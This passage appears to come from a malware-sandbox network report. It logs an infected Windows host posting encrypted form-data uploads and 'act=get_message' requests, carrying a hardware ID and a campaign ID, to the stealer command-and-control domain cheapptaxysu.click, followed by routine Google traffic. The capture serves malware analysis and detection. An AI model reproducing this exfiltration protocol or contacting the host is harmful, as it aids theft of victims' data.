43 5a 4a 76 73 73 2d 2d 67 65 Data Ascii: --HK8Q66R5AINP05L0AVYContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--HK8Q66R5AINP05L0AVYContent-Disposition: form-data; name="pid"1--HK8Q66R5AINP05L0AVYContent-Disposition: form-data; name="lid"CZJvss--ge
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: cc a7 d1 b5 28 f8 9f 93 11 87 c2 8c 71 67 ce b8 54 17 32 d9 09 e3 7c dd 8f d2 6f fb fa d7 a4 c4 00 6f 1b 94 1e 8a 34 ab 45 2c 8f 26 bd bd aa 41 14 b5 ee c3 54 7d df 5d 5a e1 5b b4 76 38 a2 c1 d6 db 75 d4 61 8b 2e 62 48 b9 11 53 26 b4 05 b8 68 95 ab ad 9e 1f 90 e6 bd 5d 29 4e 66 39 75 d5 38 4a 6e 3a 22 2c 16 11 17 67 84 01 4e 25 10 6c 36 bb d1 83 cf 4e 26 0d 91 5e c4 b9 c5 66 44 ac a8 15 7a 7c 0d 50 0e b5 22 85 7f 70 7b c8 dd 95 95 ae 21 e4 30 54 2b 27 3f ef f1 b2 5e e5 8e a3 fc 55 cf 61 65 55 60 a3 55 80 1f 84 80 fa ad d0 f6 f0 61 b1 e1 b5 6b d5 8d 0c 7f 26 46 e9 32 c8 3e 1f cd 2e 5a 91 ab 3b ac c7 ac e7 1f 95 bf 7f b0 91 24 cc b5 44 f3 b8 9b 1d bc d5 69 3c b6 1b 6a fc e1 20 0a 66 24 cf 39 a0 c9 c5 f2 c4 35 5c 5f f9 b3 71 dc 5a 03 cc 2c e0 c4 6f 7d c0 fd Data Ascii: (qgT2\|oo4E,&AT}]Z[v8ua.bHS&h])Nf9u8Jn:",gN%l6N&^fDz\|P"p{!0T+'?^UaeU`Uak&F2>.Z;$Di<j f$95\_qZ,o}
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: 16 a2 09 68 86 6a 75 da b1 7b aa d0 d5 47 95 2d b5 b7 8b 17 ad 03 59 76 16 96 ec 09 51 99 30 ba d7 1f e3 4e d6 ae a9 04 9e ba 06 1c 95 7f b0 3f 26 1f 92 ae 06 b1 c8 c9 d5 16 7d 3f 99 5b 14 8b ea 69 c8 ca e3 4d 9c c3 07 fa d4 33 93 08 45 f6 89 7a 16 ef 15 e6 79 81 51 45 f8 b2 e0 fd 87 45 99 d0 b1 1d eb 31 13 4e fc e3 e1 7c 65 e1 9a 74 a9 7a a8 8f 83 43 c3 db 89 04 be b4 1e c6 88 85 60 1d 0d 32 87 f5 d0 64 28 34 62 74 cf 08 74 12 84 10 17 45 21 c2 3d 77 18 be 06 72 41 4f a0 e2 b4 c5 57 8e c1 3c 38 31 cc dc c0 bd fc 5b d5 3b 13 3d 1f a1 60 06 b0 0d af 38 81 01 fb 12 be 31 00 03 d9 c6 c0 37 be 19 ab 92 0f 8c 0f 8e fa b8 00 2d 7e e9 d3 93 eb f4 85 8a 9e de f8 fb 46 9b 55 fd c3 ee c6 5a 1e f7 9c 58 23 59 15 f9 df a9 5a ca e0 97 06 12 79 07 9e e1 46 43 51 ed 79 Data Ascii: hju{G-YvQ0N?&}?[iM3EzyQEE1N\|etzC`2d(4bttE!=wrAOW<81[;=`817-~FUZX#YZyFCQy
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: 95 3e 7f 26 bf 2c 39 3c 17 f0 fd 63 18 27 b1 5f 2e 5b 1e 5f b3 c7 7b e2 91 8c fb dc 6d d9 be 60 10 d5 18 1a ea c2 2a 2a dd 01 f4 fc 67 97 4b f2 4c 0b 05 c1 3a 4c 68 e7 d9 d9 cb 18 d9 90 57 c5 22 c7 80 98 ce 53 c6 ca f5 ca 59 40 e5 77 f2 5a 03 0c 00 d1 16 58 be 7a f2 92 08 2c 27 cb 20 2b 12 f0 15 08 1e 62 ba 7b 8a 94 e1 e9 ce b4 f6 c3 ec b6 90 e7 46 7b b3 16 eb f2 60 a6 56 b8 c9 50 4a c5 e2 92 2c ca fb a8 d8 5a 70 fd fb b1 50 97 dd 97 f9 f8 61 b1 77 e3 09 cf 6f 34 51 7e 72 97 9d dd 97 c8 04 9c 1f 2a c2 92 43 bd e3 8c ac 83 ef 0e 9b 28 13 36 e6 eb 8f a1 b8 b5 1e a9 17 ab 71 da a7 45 57 08 e5 7e 2a bc b6 66 38 25 6c 38 35 d3 89 64 08 39 6b 28 28 2e 7e f8 a2 7b 84 ca 9a c8 98 2d f0 1a c7 7c b4 30 63 b2 97 a2 a3 a1 06 b2 07 f4 bd 18 b8 81 c1 6a ea 52 5a ea 60 Data Ascii: >&,9<c'_.[_{m`*gKL:LhW"SY@wZXz,' +b{F{`VPJ,ZpPawo4Q~rC(6qEW~*f8%l85d9k((.~{-\|0cjRZ`
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: a9 ee 8f 85 e7 79 89 80 12 d4 a4 78 1d 4d 94 a5 75 3f 36 fc bd b1 8a 36 82 76 89 9f a4 e0 b8 b1 74 4f 53 0f e2 c3 bc 59 74 ba 3c 73 7b 0e 68 76 70 f4 8b 3d d2 6e 27 36 58 08 90 34 f7 1a d9 b5 77 c8 a4 8a e0 9f 01 48 2d a6 08 cb 72 29 d5 bc 05 f3 49 d1 6c db 01 7e 80 a1 99 99 67 a6 69 94 ce 7d bb 08 5b 79 7a 87 fc 27 d9 69 c5 3f 55 ed ba c6 a4 d3 d8 89 b4 a7 16 02 20 f7 7a f7 7b e9 8d a3 ac 88 a4 0c 8c b6 79 c4 d0 5c 08 df fc 87 97 52 ae ba 48 2f 8b ad 94 ab 43 bf a5 69 5a ea 45 1a 4a fb 3a 6f fd 86 b2 48 1e e7 aa 7a ec 8a ac d3 ac 5b f9 65 e9 14 ac b8 d6 ff fc 48 dd ef 19 56 f3 39 a5 86 f4 7b f5 a7 41 02 5c 7c 38 32 29 9d 8e 10 b3 2f b2 ea 3a 7a 23 07 e1 59 75 76 cd 95 24 a6 57 96 eb 81 2c 16 ec 96 a2 42 b2 06 3c 60 0c 92 b3 4d e5 45 84 0f 3f 17 83 3a 83 Data Ascii: yxMu?66vtOSYt<s{hvp=n'6X4wH-r)Il~gi}[yz'i?U z{y\RH/CiZEJ:oHz[eHV9{A\\|82)/:z#Yuv$W,B<`ME?:
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: 45 d2 01 fd 08 22 ee 55 c5 91 ad ca 00 85 53 5a 7e be a6 59 88 4a 54 2f f5 1c ce 8f 1a aa c7 92 f7 84 7d 4a 2f d6 96 60 ca a4 18 3f ad 07 2d 7d 87 be 98 15 f1 e2 62 e6 74 6b 3d 58 f2 41 06 b9 9e 77 e0 9c d6 3f 11 49 d3 93 c1 dd 80 03 8a 23 3c 7f d9 8c 60 47 65 a1 a6 11 5e 33 58 88 1b c0 38 cd 40 df c0 cb 00 09 f3 68 60 08 8c 78 c2 22 60 1f fd 56 70 84 7b f4 ad 71 42 ee fa fb 75 c4 b8 29 c4 ae 98 89 9e 8e f7 7b 2c 94 54 65 d2 32 95 fb 8b 3a 82 42 61 5f 1c 8e 67 09 b9 1b ea 2d 63 16 46 4f 84 5e 47 bb 95 17 fd e2 cb 22 de e9 fd d6 5b eb b0 47 00 67 dd 5c aa 1c 57 c4 d3 f6 ff 2b b7 72 d5 86 8c ce 7e 68 0d d9 45 7f b8 26 d6 7c 3d fb 92 85 91 ad 8f 28 db b5 5e d9 5c 3b 91 f5 e3 f4 87 95 94 6f 74 c2 a5 15 37 8f 83 4b 9d a2 ac 92 3e 3b 2d 9f 01 81 fd fe 6b 73 2b Data Ascii: E"USZ~YJT/}J/`?-}btk=XAw?I#<`Ge^3X8@h`x"`Vp{qBu){,Te2:Ba_g-cFO^G"[Gg\W+r~hE&\|=(^\;ot7K>;-ks+
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: b7 d6 4e de 75 91 2d 5d 65 7d b3 77 ee b2 b8 fd 46 64 58 4a 3a ff 81 c9 39 5f c0 bb d0 c5 13 c1 cf d9 29 3d ac cc b5 b3 cc 3a 68 22 ab 58 65 c0 4a 94 fe 09 bc 9b 85 6e 0a b5 6f 97 54 19 9e 12 dc d7 e9 f9 b5 88 14 6e 2c 27 12 55 f5 15 4e 27 9e 88 a2 b0 d5 3a 7e c8 0c 76 a3 93 ee df 29 de 23 d8 b3 b5 2c 8f 7b 34 c6 25 ee 29 13 51 92 36 62 da d3 9e 0f 34 ef c0 95 a1 41 ec e2 da be ed 82 cc f0 56 dd cf c4 97 7e 0a 44 90 16 87 72 dd 61 b9 04 f5 c7 dc a1 c4 82 2a 07 51 cf c7 b1 3c 2e bb 29 af 19 ad a2 d9 aa 15 fb 7a 9d 2f c7 f0 0a 26 f2 2a 56 37 7a 4b 7e 15 59 12 07 08 8e 82 60 16 11 a7 4a 86 c2 d3 e7 53 c3 60 42 3c aa 4b aa 9b b1 99 e7 9d ba 7e b4 c2 08 d3 bc 4e c3 f3 1e d0 fa e2 04 31 9b d7 09 bf b6 0c 70 52 26 d7 52 fe 0d 43 7c 1d 06 25 55 ba 56 fb 87 08 20 Data Ascii: Nu-]e}wFdXJ:9_)=:h"XeJnoTn,'UN':~v)#,{4%)Q6b4AV~DraQ<.)z/&V7zK~Y`JS`B<K~N1pR&RC\|%UV
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: b9 ba 9d 1e 7a 25 16 55 fa 99 78 a5 5d 6a b8 10 da 6a 76 7d 71 11 04 de 66 ea 26 f6 c7 8b e8 23 88 31 8d 8e 6d 6e c8 1a 23 f2 51 80 58 be bc 6a d1 97 2a 1b 82 5c 4d 17 b1 b1 a5 43 5c 71 10 f8 b6 c2 41 3b 4f 19 ba 33 df 24 9a 70 ff 03 22 d7 4d 0a 38 a3 6c 7e d1 42 0e 09 e2 31 20 4b 9d a9 37 3a 16 07 4a 9f 33 9c 40 d6 6d 26 2d e4 2c dc 92 19 57 db f9 02 26 37 d3 a9 e6 50 e0 65 66 3c 02 60 f0 8f 46 e7 9c 86 c4 68 f5 06 eb 1f 98 25 0b 63 ad 4d f7 34 cb f7 73 77 9d 8b fa 8f cc d9 8d c0 7c fa db fe 5c 00 91 1b fc fa 4c f9 64 fe 09 27 0f f5 df bd 5e 55 77 08 65 06 43 8e af 66 1a 79 6f 9c b5 2d 59 94 b9 d4 be af 78 8b 69 bc c1 b2 4b de 23 47 aa a1 d8 9b bf 1a eb cb 32 7e 83 97 5b 14 cd 72 64 51 af 18 7a a9 23 0f 90 e0 a2 51 17 67 a9 f5 14 b0 fc bd 5a bb fb b2 ff Data Ascii: z%Ux]jjv}qf&#1mn#QXj*\MC\qA;O3$p"M8l~B1 K7:J3@m&-,W&7Pef<`Fh%cM4sw\|\Ld'^UweCfyo-YxiK#G2~[rdQz#QgZ
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: 08 af 42 e0 10 a8 6f 45 e7 2f 47 50 e7 13 f0 3d dc 12 1c 7a b0 70 74 6f 23 6a 99 ae 10 2f 45 c1 be 7c 7c 28 75 49 e9 18 39 03 6a 47 c9 1f 52 a0 23 66 cd 46 58 e3 25 c8 51 65 32 9e 74 6a 59 4b 7b 07 89 bf fe fa 43 58 63 cf f4 4b 82 f6 64 f8 dc 7f 21 bf 4d c2 99 98 83 28 50 b2 85 5a ec 26 f9 90 db 93 2b 03 f2 0c 41 db 12 80 2c e2 7b fd 69 f7 4c 75 87 cb f2 39 ca 8d c1 32 e3 40 14 68 71 9f d0 48 7f bd 04 f5 3c c8 28 a1 4c 3b e7 de 23 0d 4a 5a 06 6a cb 36 0d dc 6f dc 21 94 80 5f 79 02 73 19 6a 68 52 5e 48 67 49 b7 12 f9 b9 97 29 f2 d5 ac ab 87 43 e9 96 2d d4 a0 47 51 81 cc 4f 75 21 af ee 2c 67 fb 2d 3d dc 33 0a f8 0b df d5 c1 4e ea e7 db e7 8f 29 ac ea 33 18 48 4a ca 6a f6 d0 83 f0 e0 50 69 e5 8f 6d 2b 79 62 90 a1 00 df 50 d9 c6 c1 0d 44 b4 33 54 ae 85 0e 4a Data Ascii: BoE/GP=zpto#j/E\|\|(uI9jGR#fFX%Qe2tjYK{CXcKd!M(PZ&+A,{iLu92@hqH<(L;#JZj6o!_ysjhR^HgI)C-GQOu!,g-=3N)3HJjPim+ybPD3TJ
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: b0 46 7c 3d c9 0b a2 53 aa c0 6c 97 58 93 34 d1 56 06 2f 9f 3f 7f fc f6 ed 5e 72 cc cd 0a 2a 6b cd 08 34 62 a7 c7 9f fc e3 b6 f9 53 fc 92 b2 b7 1d f7 ec cd 0f 83 e6 5b 8f ee a2 58 7b 9f 91 95 c0 17 b2 db 58 36 15 f9 da 19 eb 06 9e 2c 48 a5 a6 f6 8d 47 b8 39 be ea fb f5 61 cb c3 1f 8d 1d 82 e1 8f 5f 94 8e 82 33 d1 59 5b b8 cb c2 eb 8c 8e 60 1e 3b cd d0 2f e1 e0 93 b6 12 f0 aa ba 8b 88 74 92 4c 6e f5 71 0e 5a c0 4c 8b fb 13 dd 2e 4d 49 f0 9b 66 7b fe 51 ef 28 5e ac 32 3f 73 d3 aa 9e 7b 74 d2 55 b9 8c bc ac 1d 43 02 b4 ea b5 88 65 d0 54 a3 0e 76 7e 7f bf 61 31 3c d3 be 18 2e 5d 7c 9b b3 7f b4 52 42 fc 8a 43 07 ff a6 6e f0 4b a4 08 eb 07 6c 9e e4 99 8f 32 fd 70 24 3f d1 e7 02 7e d9 d2 42 91 d3 f7 c2 44 78 65 d6 06 d5 e6 a6 33 b5 aa 1b 05 5a 40 3e 48 f4 a9 e7 Data Ascii: F\|=SlX4V/?^r*k4bS[X{X6,HG9a_3Y[`;/tLnqZL.MIf{Q(^2?s{tUCeTv~a1<.]\|RBCnKl2p$?~BDxe3Z@>H
2024-12-22 01:19:16 UTC	1139	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tdchvhkeamu331p2p03k1ditge; expires=Wed, 16 Apr 2025 19:05:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HmIJmrS%2FlqAULjZWxG2E8GfNBm8K4UWF%2Bgjj1WxD1Fayy8WC18E6Ag4h%2BwCatwKizW65OMi0EUkUDgb%2Ffq0hCSuFjK%2BLuRPtXBN0Zxg6BkCbX7QnOTKeg9GMjH8AUEKG9G5VUtY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c484fb97142d4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1573&rtt_var=620&sent=172&recv=312&lost=0&retrans=0&sent_bytes=2843&recv_bytes=302371&delivery_rate=1722713&cwnd=247&unsent_bytes=0&cid=36a1345e2fb878c9&ts=2775&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	50304	104.21.67.146	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:17 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: cheapptaxysu.click
2024-12-22 01:19:17 UTC	85	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=CZJvss--geopoxid&j=&hwid=F14195A540BC0B98AC8923850305D13E
2024-12-22 01:19:18 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rtch1n88rnjfkv8i4rf77mi6a1; expires=Wed, 16 Apr 2025 19:05:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FDjIfTvC123RmBX24Zjkt3vhkA6H0NiFtKuDa2GGxiJrka7XUIzbkkeDfEyc0oohkkZMBvrlncFXtICw8wmKWlDTy%2BX%2Bkw3Klg4pYMO1IVn9xarfd4UPhnmQulO5VcqjacQcaQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4869ba1942e8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1587&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1076&delivery_rate=1753753&cwnd=250&unsent_bytes=0&cid=283a2e611a0dfe8c&ts=1046&x=0"
2024-12-22 01:19:18 UTC	54	IN	Data Raw: 33 30 0d 0a 55 56 71 59 69 30 4a 31 4c 4c 4d 61 4f 59 76 55 30 50 50 6b 6d 50 52 33 75 75 4c 31 71 59 4b 50 61 54 35 5a 48 50 7a 64 33 33 41 4b 42 77 3d 3d 0d 0a Data Ascii: 30UVqYi0J1LLMaOYvU0PPkmPR3uuL1qYKPaT5ZHPzd33AKBw==
2024-12-22 01:19:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	50482	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:04 UTC	495	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKDhygE= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:21:05 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:21:04 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-lPUruCoYTdPlNJAtBuDanw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:21:05 UTC	124	IN	Data Raw: 33 34 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 33 20 69 6e 67 72 65 64 69 65 6e 74 20 70 65 70 70 65 72 6d 69 6e 74 20 63 6c 6f 75 64 20 63 6f 6f 6b 69 65 73 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 20 73 63 68 65 64 75 6c 65 22 2c 22 73 6e 6f 77 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22 62 61 72 72 65 64 20 6f Data Ascii: 34d)]}'["",["3 ingredient peppermint cloud cookies","college football playoff schedule","snow weather forecast","barred o
2024-12-22 01:21:05 UTC	728	IN	Data Raw: 77 6c 20 6f 6e 20 63 68 72 69 73 74 6d 61 73 20 74 72 65 65 22 2c 22 70 73 35 20 70 72 6f 22 2c 22 64 6f 67 65 63 6f 69 6e 20 70 72 69 63 65 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 61 73 74 72 61 6e 69 73 20 6d 69 63 72 6f 67 65 6f 20 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 6c 61 75 6e 63 68 22 2c 22 77 68 61 74 20 69 73 20 73 6f 6e 69 63 20 33 20 73 74 72 65 61 6d 69 6e 67 20 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 Data Ascii: wl on christmas tree","ps5 pro","dogecoin price prediction","astranis microgeo spacex falcon 9 launch","what is sonic 3 streaming on"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmc
2024-12-22 01:21:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	50481	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:21:04 UTC	398	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKDhygE= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:21:05 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 22 Dec 2024 01:21:04 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:21:05 UTC	372	IN	Data Raw: 64 63 36 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c Data Ascii: dc6)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\
2024-12-22 01:21:05 UTC	1390	IN	Data Raw: 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 Data Ascii: lass\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u00
2024-12-22 01:21:05 UTC	1390	IN	Data Raw: 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c Data Ascii: 03cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\
